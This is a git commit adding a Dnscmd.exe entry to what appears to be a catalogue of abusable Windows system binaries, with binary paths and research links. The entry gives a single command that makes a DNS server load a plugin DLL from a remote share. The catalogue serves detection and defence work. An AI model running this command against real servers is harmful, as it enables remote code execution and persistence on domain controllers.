Dnscmd.exe

master
Oddvar Moe 2018-05-09 14:47:05 +02:00
parent 3910d326ee
commit 8b1e87b251
2 changed files with 34 additions and 0 deletions

View File

@ -15,6 +15,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
[Cscript.exe](OSBinaries/Cscript.md) [Cscript.exe](OSBinaries/Cscript.md)
[Dfsvc.exe](OSBinaries/Dfsvc.md) [Dfsvc.exe](OSBinaries/Dfsvc.md)
[Diskshadow.exe](OSBinaries/Diskshadow.md) [Diskshadow.exe](OSBinaries/Diskshadow.md)
[Dnscmd.exe](OSBinaries/Dnscmd.md)
[Esentutl.exe](OSBinaries/Esentutl.md) [Esentutl.exe](OSBinaries/Esentutl.md)
[Extexport.exe](OSBinaries/Extexport.md) [Extexport.exe](OSBinaries/Extexport.md)
[Extrac32.exe](OSBinaries/Extrac32.md) [Extrac32.exe](OSBinaries/Extrac32.md)

33
OSBinaries/Dnscmd.md Normal file
View File

@ -0,0 +1,33 @@
## Dnscmd.exe
* Functions: Execute
```
dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
```
Acknowledgements:
* Dimitrios Slamaris - @dim0x69
Code sample:
*
Resources:
* https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
* https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp
* https://twitter.com/Hexacorn/status/994000792628719618
Full path:
```
c:\windows\system32\Dnscmd.exe
c:\windows\sysWOW64\Dnscmd.exe
```
Notes:
Used on Windows servers for DNS management
Detection: